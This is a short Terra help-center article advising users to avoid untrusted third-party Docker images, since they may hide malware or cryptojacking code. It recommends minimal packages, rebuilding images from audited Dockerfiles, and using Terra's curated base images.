Creating safe and secure custom Docker images

Allie Hajian
  • Updated

If you are bringing your own Docker image, please consider the following security advisory

If you are basing your image on anything other than Terra Base Images,  you have to decide whether you trust the provider of the image. Even if you think it might be a good idea to save yourself some time by building on somebody else’s work, it's a risk. From a security point of view, there are better paths to a safe and secure custom Docker than simply pulling an image. 

What's the risk of a third-party image?  

Because anyone can publish an image on Docker Hub, third-party containers may contain malware or insecure software, or may set insecure settings. These may result in cryptojacking. For example, a malicious actor who stores malicious code as a Github gist and thens RUN curl when the container is built. See this Example of a malicious image in Dockerhub.

Best practices 

Limit packages: Because packages increase the risks, don't install unnecessary packages in your containers. 

Recreate from scratch with the third-party image as a template: Try inspecting the Dockerfile and only include those parts you feel are trustworthy. Note that auditing a Dockerfile can sometimes take as long as configuring the image yourself.  

Publishing your own images public versus non-public options: Note that your Docker image does not have to be public if you use GCR. If you use DockerHub, however, the Docker image needs to be public.

Using Terra base images

Terra base images are curated, trusted images. You can learn more on how to create a custom image using our base images here

Was this article helpful?

1 out of 2 found this helpful

Have more questions? Submit a request

Comments

0 comments

Please sign in to leave a comment.